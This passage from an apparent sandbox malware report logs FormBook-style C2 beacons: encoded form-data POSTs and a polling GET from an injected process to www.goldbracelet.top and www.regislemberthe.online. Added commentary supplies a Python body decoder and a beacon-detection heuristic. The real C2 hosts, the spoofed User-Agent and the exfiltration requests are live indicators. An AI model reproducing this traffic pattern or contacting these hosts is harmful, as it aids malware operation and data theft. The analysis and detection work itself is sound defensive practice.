                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=q317PC9xk8DkBeujY9mlBokcwRJQbPsT%2BlPW35RGYBfG3T9Gm9kltMhSdVNgx2lqM9%2BX3Wcd7dCVQfGak2zC%2FQHtJ17rBjKRCfkyH91%2B1aXmiO5hISP%2FtASdxMsoEu%2FlClF4T2zoWQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 8e888346fb1a42b0-EWR
                                                                                Content-Encoding: gzip
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1537&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=719&delivery_rate=0&cwnd=229&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 61 36 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 85 de 61 3c 40 88 45 97 43 36 a2 e0 c2 95 27 48 9c b1 09 a4 93 32 66 61 6f 2f 55 0b e2 da a5 ab 07 ef e7 e3 61 ac 43 76 6d 83 91 3d 39 ac a9 66 76 db f5 06 0e 45 43 22 62 41 fb 32 d1 3e 2b 6d 83 a1 d0 34 eb 85 a5 b2 3a 8c dd f7 22 76 0e ed 3b 9e d9 ea 96 b2 f4 49 ee 9f 99 5d 68 76 79 b2 32 06 3c 8c 9e 28 49 0f b5 00 a5 9b 0f 99 e1 74 3e ee c1 0b c1 2e 6a 19 18 ae 9a 58 28 4f c0 aa 45 61 f4 3d 83 31 7f c4 af 11 0f 5b 30 e7 0b 24 02 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: a6M0a<@EC6'H2fao/UaCvm=9fvEC"bA2>+m4:"v;I]hvy2<(It>.jX(OEa=1[0$0
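The body of that 403 is printed only as bytes, but the framing is readable: `61 36 0d 0a` is the chunk-size line `a6` (166 bytes), the 166 bytes that follow are one gzip member (`1f 8b` magic, mtime 0, OS 3), and `30 0d 0a 0d 0a` is the zero-length last chunk. The final four bytes of the member, `24 02 00 00`, are its ISIZE field, so the uncompressed page is 0x224 = 548 bytes, the same size as the plain nginx 403 page this host returns to the GET in session 32 further down. The script below is an added example, not part of the Joe Sandbox report: it dechunks and gunzips the hex exactly as copied from the Data Raw line so the page the server actually sent can be read; the helper names are this example's own.

```python
"""Dechunk and gunzip a response body from a Joe Sandbox "Data Raw" hex dump.

Added example, not part of the report. RAW_HEX is copied verbatim from the
Data Raw line of the 403 response above; the function names are this
example's own.
"""
import gzip
from typing import Tuple

# Layout: chunk-size line "a6" CRLF, 166-byte gzip member, CRLF, last-chunk "0" CRLF CRLF
RAW_HEX = """
61 36 0d 0a
1f 8b 08 00 00 00 00 00 00 03
ed 8e 4d 0a c2 30 10 85 f7 85 de 61 3c 40 88 45 97 43 36 a2
e0 c2 95 27 48 9c b1 09 a4 93 32 66 61 6f 2f 55 0b e2 da a5
ab 07 ef e7 e3 61 ac 43 76 6d 83 91 3d 39 ac a9 66 76 db f5
06 0e 45 43 22 62 41 fb 32 d1 3e 2b 6d 83 a1 d0 34 eb 85 a5
b2 3a 8c dd f7 22 76 0e ed 3b 9e d9 ea 96 b2 f4 49 ee 9f 99
5d 68 76 79 b2 32 06 3c 8c 9e 28 49 0f b5 00 a5 9b 0f 99 e1
74 3e ee c1 0b c1 2e 6a 19 18 ae 9a 58 28 4f c0 aa 45 61 f4
3d 83 31 7f c4 af 11 0f 5b 30 e7 0b 24 02 00 00
0d 0a 30 0d 0a 0d 0a
"""


def dechunk(body: bytes) -> bytes:
    """Reassemble an HTTP/1.1 chunked transfer-coding body (RFC 9112 section 7.1)."""
    out = bytearray()
    pos = 0
    while True:
        eol = body.index(b"\r\n", pos)
        size = int(body[pos:eol].split(b";", 1)[0], 16)   # drop chunk extensions
        pos = eol + 2
        if size == 0:
            return bytes(out)                              # last-chunk; trailers ignored
        out += body[pos:pos + size]
        pos += size
        if body[pos:pos + 2] != b"\r\n":
            raise ValueError("chunk data not followed by CRLF")
        pos += 2


def gzip_isize(member: bytes) -> int:
    """ISIZE field: uncompressed length mod 2**32, last four bytes of a gzip member (RFC 1952)."""
    if member[:2] != b"\x1f\x8b":
        raise ValueError("not a gzip stream")
    return int.from_bytes(member[-4:], "little")


def decode_body(hex_dump: str) -> Tuple[bytes, bytes]:
    """Return (gzip member, decompressed text) for a chunked + gzip Data Raw dump."""
    member = dechunk(bytes.fromhex(hex_dump))
    text = gzip.decompress(member)        # verifies CRC32 and ISIZE, raises on mismatch
    return member, text


if __name__ == "__main__":
    member, text = decode_body(RAW_HEX)
    print(len(member), "gzip bytes ->", len(text), "bytes (ISIZE", gzip_isize(member), ")")
    print(text.decode("latin-1"))
```

`gzip.decompress` checks the CRC32 and ISIZE trailer, so a body transcribed with a single wrong byte fails loudly instead of yielding garbage. The same two steps apply to the other gzip bodies in this section; the one in session 31 is split across two chunks (`f`, then `9c`) and is cut off in the report, so it cannot be completed from the page.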


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                30 | 192.168.2.8 | 49743 | 104.21.36.239 | 80 | 6504 | C:\Program Files (x86)\sTKjbfnqUiFUPXzAsVOzGcBuNiihsnXtgNMkJMUzAYYwyrgjQCImLGTDiMrnzKtNpmhAgx\YpbicUfTwt.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Nov 26, 2024 09:29:49.708719015 CET | 739 | OUT | POST /eln6/ HTTP/1.1
                                                                                Accept: */*
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Accept-Language: en-US,en;q=0.9
                                                                                Host: www.goldbracelet.top
                                                                                Cache-Control: no-cache
                                                                                Content-Length: 225
                                                                                Connection: close
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Origin: http://www.goldbracelet.top
                                                                                Referer: http://www.goldbracelet.top/eln6/
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
                                                                                Data Raw: 79 6e 6c 54 3d 51 54 52 34 30 74 4f 53 5a 30 6b 50 76 31 30 56 41 32 61 30 48 52 33 4e 4a 38 66 54 50 56 6f 5a 77 32 49 56 78 35 4d 6b 46 76 39 56 50 41 34 76 4f 30 67 36 55 73 76 45 51 7a 65 53 48 67 76 73 69 42 55 78 76 52 37 48 76 4b 41 43 73 42 6e 47 48 4d 48 55 65 74 41 41 6b 79 72 4c 47 6e 56 78 68 31 70 37 56 71 32 6f 41 76 47 49 37 75 6c 61 46 50 68 55 64 48 77 52 62 65 34 65 68 6f 57 50 72 66 34 69 6d 54 48 32 68 6c 2b 4e 57 72 77 72 76 64 76 69 50 54 79 4b 30 7a 47 6d 67 64 4d 51 49 30 37 35 62 36 6f 42 66 4b 64 46 6c 6a 49 71 61 4c 5a 43 34 57 6b 50 66 49 63 79 61 4c 56 42 34 2f 51 62 4c 4d 6a 72 42 74 45 64 44 51 36 53 53 79 75 54 4b 6e 64 56 76 33 31 6c
                                                                                Data Ascii: ynlT=QTR40tOSZ0kPv10VA2a0HR3NJ8fTPVoZw2IVx5MkFv9VPA4vO0g6UsvEQzeSHgvsiBUxvR7HvKACsBnGHMHUetAAkyrLGnVxh1p7Vq2oAvGI7ulaFPhUdHwRbe4ehoWPrf4imTH2hl+NWrwrvdviPTyK0zGmgdMQI075b6oBfKdFljIqaLZC4WkPfIcyaLVB4/QbLMjrBtEdDQ6SSyuTKndVv31l
                                                                                Nov 26, 2024 09:29:50.901792049 CET | 960 | IN | HTTP/1.1 403 Forbidden
                                                                                Date: Tue, 26 Nov 2024 08:29:50 GMT
                                                                                Content-Type: text/html
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kzSX5KwzPEehZwDaykoMuLeNcZsKzStc9zadiFs5COioq0Rs9RatAy%2FlHHqce8rviVhARPv%2F1hZh19XhBlvrzBxOKSOZjOs%2FE2L2t1vQUwpEPclPLPPFQL%2BVBjVJyI20qs%2BT%2B9TMFQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 8e888357e93e4379-EWR
                                                                                Content-Encoding: gzip
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2132&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=739&delivery_rate=0&cwnd=192&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 61 36 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 85 de 61 3c 40 88 45 97 43 36 a2 e0 c2 95 27 48 9c b1 09 a4 93 32 66 61 6f 2f 55 0b e2 da a5 ab 07 ef e7 e3 61 ac 43 76 6d 83 91 3d 39 ac a9 66 76 db f5 06 0e 45 43 22 62 41 fb 32 d1 3e 2b 6d 83 a1 d0 34 eb 85 a5 b2 3a 8c dd f7 22 76 0e ed 3b 9e d9 ea 96 b2 f4 49 ee 9f 99 5d 68 76 79 b2 32 06 3c 8c 9e 28 49 0f b5 00 a5 9b 0f 99 e1 74 3e ee c1 0b c1 2e 6a 19 18 ae 9a 58 28 4f c0 aa 45 61 f4 3d 83 31 7f c4 af 11 0f 5b 30 e7 0b 24 02 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: a6M0a<@EC6'H2fao/UaCvm=9fvEC"bA2>+m4:"v;I]hvy2<(It>.jX(OEa=1[0$0


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                31 | 192.168.2.8 | 49744 | 104.21.36.239 | 80 | 6504 | C:\Program Files (x86)\sTKjbfnqUiFUPXzAsVOzGcBuNiihsnXtgNMkJMUzAYYwyrgjQCImLGTDiMrnzKtNpmhAgx\YpbicUfTwt.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Nov 26, 2024 09:29:52.599502087 CET | 1756 | OUT | POST /eln6/ HTTP/1.1
                                                                                Accept: */*
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Accept-Language: en-US,en;q=0.9
                                                                                Host: www.goldbracelet.top
                                                                                Cache-Control: no-cache
                                                                                Content-Length: 1241
                                                                                Connection: close
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Origin: http://www.goldbracelet.top
                                                                                Referer: http://www.goldbracelet.top/eln6/
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
                                                                                Data Raw: 79 6e 6c 54 3d 51 54 52 34 30 74 4f 53 5a 30 6b 50 76 31 30 56 41 32 61 30 48 52 33 4e 4a 38 66 54 50 56 6f 5a 77 32 49 56 78 35 4d 6b 46 76 31 56 50 53 77 76 49 6e 49 36 58 73 76 45 4f 44 65 66 48 67 75 75 69 42 4d 39 76 52 33 35 76 49 34 43 76 67 48 47 50 64 48 55 45 39 41 41 73 53 72 57 62 58 55 72 68 31 5a 2f 56 71 6d 6f 41 76 47 49 37 72 68 61 43 62 31 55 61 33 77 53 63 65 34 43 33 59 58 53 72 62 64 64 6d 54 44 4d 68 78 4b 4e 57 4c 41 72 74 6f 37 69 58 44 79 4d 31 7a 47 2b 67 64 49 50 49 30 6e 50 62 36 4d 37 66 4e 78 46 6f 6e 4a 31 66 76 73 5a 75 41 6b 65 65 61 38 49 55 34 30 6e 35 4f 38 68 42 66 33 65 41 34 38 6d 4e 77 79 64 48 51 48 6d 63 57 6c 44 76 51 73 36 43 6c 4f 72 6a 70 68 6f 34 49 62 36 54 55 33 65 6c 64 2f 33 77 4e 71 30 6b 37 47 4f 53 4c 54 79 54 4d 6f 53 64 2b 5a 45 64 36 61 73 61 77 76 53 51 35 70 52 6f 63 6e 2f 45 44 53 78 66 67 76 50 43 53 38 50 67 71 56 62 6e 43 47 43 67 2f 4e 32 48 2b 78 6d 35 75 4c 70 56 48 47 6f 34 34 47 30 31 4d 4c 34 6a 44 4d 61 59 39 49 6c 69 4d 78 66 2b [TRUNCATED]
                                                                                Data Ascii: ynlT=QTR40tOSZ0kPv10VA2a0HR3NJ8fTPVoZw2IVx5MkFv1VPSwvInI6XsvEODefHguuiBM9vR35vI4CvgHGPdHUE9AAsSrWbXUrh1Z/VqmoAvGI7rhaCb1Ua3wSce4C3YXSrbddmTDMhxKNWLArto7iXDyM1zG+gdIPI0nPb6M7fNxFonJ1fvsZuAkeea8IU40n5O8hBf3eA48mNwydHQHmcWlDvQs6ClOrjpho4Ib6TU3eld/3wNq0k7GOSLTyTMoSd+ZEd6asawvSQ5pRocn/EDSxfgvPCS8PgqVbnCGCg/N2H+xm5uLpVHGo44G01ML4jDMaY9IliMxf+ [TRUNCATED]
                                                                                Nov 26, 2024 09:29:53.572052956 CET | 794 | IN | HTTP/1.1 403 Forbidden
                                                                                Date: Tue, 26 Nov 2024 08:29:53 GMT
                                                                                Content-Type: text/html
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aKhB57a8n8D5b70YlKyg78E8H4%2BFPK39SaU39fr9i1K64zzhxuNrpJJERYiTaT22AsfseSK9pzjAstZZck19q3gGpAP5UiOrUr71qYucymWzil0lh1v2CRZz277W2V3XL6C0yvqiSQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 8e8883689fbc42ab-EWR
                                                                                Content-Encoding: gzip
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1647&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1756&delivery_rate=0&cwnd=197&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 00 00 00 ff ff 0d 0a
                                                                                Data Ascii: f
                                                                                Nov 26, 2024 09:29:53.572252989 CET | 167 | IN | Data Raw: 39 63 0d 0a ed 8e 4d 0a c2 30 10 85 f7 85 de 61 3c 40 88 45 97 43 36 a2 e0 c2 95 27 48 9c b1 09 a4 93 32 66 61 6f 2f 55 0b e2 da a5 ab 07 ef e7 e3 61 ac 43 76 6d 83 91 3d 39 ac a9 66 76 db f5 06 0e 45 43 22 62 41 fb 32 d1 3e 2b 6d 83 a1 d0 34 eb
                                                                                Data Ascii: 9cM0a<@EC6'H2fao/UaCvm=9fvEC"bA2>+m4:"v;I]hvy2<(It>.jX(OEa=1[0$0


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                32 | 192.168.2.8 | 49745 | 104.21.36.239 | 80 | 6504 | C:\Program Files (x86)\sTKjbfnqUiFUPXzAsVOzGcBuNiihsnXtgNMkJMUzAYYwyrgjQCImLGTDiMrnzKtNpmhAgx\YpbicUfTwt.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Nov 26, 2024 09:29:55.430844069 CET | 456 | OUT | GET /eln6/?ynlT=dR5Y3aKNW3l55kULB1rxeiPlAcv1NFYB73Jn5o4FF8VATzcLQGkwEffEVFziLlDWg39FgTTosOgM31CCD8Gpd9wAhADTehU2x1Z0W7eNB4qt+OY8C4hNNFAeSI1HhK3X2w==&BZcp=FxLxsNCx3xt HTTP/1.1
                                                                                Accept: */*
                                                                                Accept-Language: en-US,en;q=0.9
                                                                                Host: www.goldbracelet.top
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
                                                                                Nov 26, 2024 09:29:56.496787071 CET | 1236 | IN | HTTP/1.1 403 Forbidden
                                                                                Date: Tue, 26 Nov 2024 08:29:56 GMT
                                                                                Content-Type: text/html
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TPIZitb%2F5CIawpRDyT03ewKyYU1QYVC6KkknVeQ2eQ%2BviijUHj6bW827MwRmk3xnaYBo2KPONeQ8x3N0xYkI0Qn0NW4qSdtMXCrD7aqUgT9Ynn1RgE778l0Oax2IR3rkCdi70KnlbA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 8e88837ada2872b6-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1800&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=456&delivery_rate=0&cwnd=237&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 [TRUNCATED]
                                                                                Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                Nov 26, 2024 09:29:56.496808052 CET | 75 | IN | Data Raw: 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: ... a padding to disable MSIE and Chrome friendly error page -->0
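Sessions 29 to 32 above show one fixed cycle from the injected process, and sessions 33 to 36 to www.regislemberthe.online below repeat it: three POSTs to a short directory path (`/eln6/`, `/1y0g/`) carrying a single form field `ynlT` of 205, 225 and 1241 bytes, then a GET to the same path with `ynlT` and a second field `BZcp` in the query string, every request with `Connection: close`, `Origin` and `Referer` pointing at that same path, and the same unusual User-Agent. FormBook is known to walk a list of domains of which only one is the live C2, so the host that answers the GET with 200 OK (www.regislemberthe.online) deserves priority over one answering 403 (www.goldbracelet.top). The heuristic below is an added example, not the report's or FormBook's code; its transaction list is constructed by hand from the request lines in this section (form bodies shortened), and the www.example.com control entry, the field names and the thresholds are its own assumptions.

```python
"""FormBook-style HTTP beacon heuristic over a list of HTTP transactions.

Added example, not part of the Joe Sandbox report and not FormBook's code.
TRANSACTIONS is constructed from the request/response lines in this section
(form bodies shortened); the www.example.com control entry, the field names
and the thresholds are this example's own assumptions.
"""
import re
from collections import defaultdict
from dataclasses import dataclass
from typing import Dict, List, Optional
from urllib.parse import parse_qsl, urlsplit

# Same User-Agent in every request above; keyed on its least browser-like token.
UA = ("Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) "
      "Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 "
      "(3.43.0.2357.18, like Chrome 20150815)")
UA_MARKER = "BitdefenderSafepay/2016"
# One short alphanumeric directory, e.g. /eln6/ or /1y0g/ (length bounds assumed).
C2_PATH = re.compile(r"^/[a-z0-9]{3,6}/$")


@dataclass
class Tx:
    session: int
    pid: int
    host: str
    method: str
    target: str                    # request-target as sent, query string included
    user_agent: str
    form_body: str = ""            # urlencoded POST body, ASCII as printed
    status: Optional[int] = None   # response status; None = no reply captured


TRANSACTIONS: List[Tx] = [
    Tx(29, 6504, "www.goldbracelet.top", "POST", "/eln6/", UA, "ynlT=QTR40tOSZ0kPsUEV...", 403),
    Tx(30, 6504, "www.goldbracelet.top", "POST", "/eln6/", UA, "ynlT=QTR40tOSZ0kPv10V...", 403),
    Tx(31, 6504, "www.goldbracelet.top", "POST", "/eln6/", UA, "ynlT=QTR40tOSZ0kPv10V...", 403),
    Tx(32, 6504, "www.goldbracelet.top", "GET",
       "/eln6/?ynlT=dR5Y3aKNW3l55kULB1rx...&BZcp=FxLxsNCx3xt", UA, "", 403),
    Tx(33, 6504, "www.regislemberthe.online", "POST", "/1y0g/", UA, "ynlT=FGGxLekk0opajXaq...", None),
    Tx(34, 6504, "www.regislemberthe.online", "POST", "/1y0g/", UA, "ynlT=FGGxLekk0opaizeq...", None),
    Tx(35, 6504, "www.regislemberthe.online", "POST", "/1y0g/", UA, "ynlT=FGGxLekk0opaizeq...", None),
    Tx(36, 6504, "www.regislemberthe.online", "GET",
       "/1y0g/?BZcp=FxLxsNCx3xt&ynlT=IEuRIrUs/61ernzQacDn...", UA, "", 200),
    # Constructed control: an ordinary page fetch that must not be flagged.
    Tx(99, 6504, "www.example.com", "GET", "/index.html",
       "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Firefox/115.0", "", 200),
]


def single_field_key(body: str) -> Optional[str]:
    """Field name if the body is exactly one key=value pair, else None."""
    pairs = parse_qsl(body, keep_blank_values=True)
    return pairs[0][0] if len(pairs) == 1 else None


def beacon_candidates(txs: List[Tx], min_posts: int = 2) -> Dict[str, dict]:
    """Per (pid, host): flag N single-field POSTs to a C2-style path followed by a
    GET to the same path whose query string repeats that field name."""
    by_peer: Dict[tuple, List[Tx]] = defaultdict(list)
    for tx in txs:
        by_peer[(tx.pid, tx.host)].append(tx)

    findings: Dict[str, dict] = {}
    for (pid, host), seq in by_peer.items():
        post_keys = [k for k in (single_field_key(tx.form_body) for tx in seq
                                 if tx.method == "POST" and C2_PATH.match(tx.target)) if k]
        polls = [tx for tx in seq
                 if tx.method == "GET" and C2_PATH.match(urlsplit(tx.target).path)]
        if len(post_keys) < min_posts or len(set(post_keys)) != 1 or not polls:
            continue
        key, poll = post_keys[0], polls[-1]
        if key not in {k for k, _ in parse_qsl(urlsplit(poll.target).query)}:
            continue
        findings[host] = {
            "pid": pid,
            "path": urlsplit(poll.target).path,
            "form_key": key,
            "post_count": len(post_keys),
            "hardcoded_ua": all(UA_MARKER in tx.user_agent for tx in seq),
            "poll_status": poll.status,
            # 200 to the poll is what to prioritise; 403/404 or silence is how the
            # decoy or dead entries in the sample's host list answer.
            "likely_live": poll.status == 200,
        }
    return findings


if __name__ == "__main__":
    for host, finding in beacon_candidates(TRANSACTIONS).items():
        print(host, finding)
```

The grouping key is (PID, Host) rather than destination IP on purpose: both domains here sit behind shared hosting (104.21.36.239 is a Cloudflare address), so per-IP aggregation would blur the two cycles together. In a proxy or NetFlow-plus-HTTP log the same logic runs over parsed request lines; the three fixed body sizes (205, 225, 1241 bytes) are a cheap extra condition if a detection needs to be tighter than the path and field-name shape.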


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                33 | 192.168.2.8 | 49746 | 208.91.197.27 | 80 | 6504 | C:\Program Files (x86)\sTKjbfnqUiFUPXzAsVOzGcBuNiihsnXtgNMkJMUzAYYwyrgjQCImLGTDiMrnzKtNpmhAgx\YpbicUfTwt.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Nov 26, 2024 09:30:03.863311052 CET | 734 | OUT | POST /1y0g/ HTTP/1.1
                                                                                Accept: */*
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Accept-Language: en-US,en;q=0.9
                                                                                Host: www.regislemberthe.online
                                                                                Cache-Control: no-cache
                                                                                Content-Length: 205
                                                                                Connection: close
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Origin: http://www.regislemberthe.online
                                                                                Referer: http://www.regislemberthe.online/1y0g/
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
                                                                                Data Raw: 79 6e 6c 54 3d 46 47 47 78 4c 65 6b 6b 30 6f 70 61 6a 58 61 71 55 64 6e 6e 56 68 53 6b 51 66 79 30 69 4a 72 78 50 52 4c 52 4d 5a 36 4d 31 69 6e 52 75 2f 78 56 64 65 4e 4d 6e 5a 33 6f 34 53 47 74 79 6b 35 31 4b 6e 54 33 36 38 79 42 46 2b 59 75 65 7a 42 48 4a 66 77 53 59 49 4a 54 2f 4c 61 4d 62 65 6d 4c 62 67 6c 37 4a 4c 4f 49 2f 72 46 47 57 57 41 72 56 7a 6c 45 59 38 79 6b 74 4a 35 4b 78 65 71 52 52 50 6e 44 5a 75 73 78 53 65 5a 39 6a 7a 52 39 69 62 77 43 61 42 33 46 35 62 4d 5a 2f 6b 47 5a 64 65 50 7a 36 6c 33 52 4f 35 51 75 78 4c 6a 75 79 6f 5a 4e 33 7a 4a 5a 58 50 6d 49 75 43 2b 39 33 64 48 6b 46 4c 73 3d
                                                                                Data Ascii: ynlT=FGGxLekk0opajXaqUdnnVhSkQfy0iJrxPRLRMZ6M1inRu/xVdeNMnZ3o4SGtyk51KnT368yBF+YuezBHJfwSYIJT/LaMbemLbgl7JLOI/rFGWWArVzlEY8yktJ5KxeqRRPnDZusxSeZ9jzR9ibwCaB3F5bMZ/kGZdePz6l3RO5QuxLjuyoZN3zJZXPmIuC+93dHkFLs=


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                34 | 192.168.2.8 | 49747 | 208.91.197.27 | 80 | 6504 | C:\Program Files (x86)\sTKjbfnqUiFUPXzAsVOzGcBuNiihsnXtgNMkJMUzAYYwyrgjQCImLGTDiMrnzKtNpmhAgx\YpbicUfTwt.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Nov 26, 2024 09:30:06.536222935 CET | 754 | OUT | POST /1y0g/ HTTP/1.1
                                                                                Accept: */*
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Accept-Language: en-US,en;q=0.9
                                                                                Host: www.regislemberthe.online
                                                                                Cache-Control: no-cache
                                                                                Content-Length: 225
                                                                                Connection: close
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Origin: http://www.regislemberthe.online
                                                                                Referer: http://www.regislemberthe.online/1y0g/
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
                                                                                Data Raw: 79 6e 6c 54 3d 46 47 47 78 4c 65 6b 6b 30 6f 70 61 69 7a 65 71 50 38 6e 6e 45 52 53 72 66 2f 79 30 33 35 72 71 50 52 33 52 4d 62 58 4a 31 78 54 52 75 66 42 56 63 66 4e 4d 72 35 33 6f 7a 79 47 6f 76 30 35 36 4b 6e 66 4a 36 38 2b 42 46 36 77 75 65 78 4a 48 4a 73 59 56 59 59 4a 52 79 72 61 4f 56 2b 6d 4c 62 67 6c 37 4a 4c 62 6e 2f 72 39 47 56 6d 77 72 55 57 4a 48 62 38 79 37 36 35 35 4b 6e 75 71 64 52 50 6e 31 5a 73 59 62 53 61 70 39 6a 79 42 39 37 71 77 4e 51 42 33 48 6b 72 4e 63 33 58 57 53 59 74 44 66 6d 57 62 6b 42 66 4d 54 39 64 53 45 6f 4b 52 4c 30 7a 68 79 58 4d 4f 2b 72 31 6a 56 74 2b 58 55 62 63 35 63 53 4d 63 76 48 5a 70 73 76 35 51 44 33 48 71 75 6b 69 44 4e
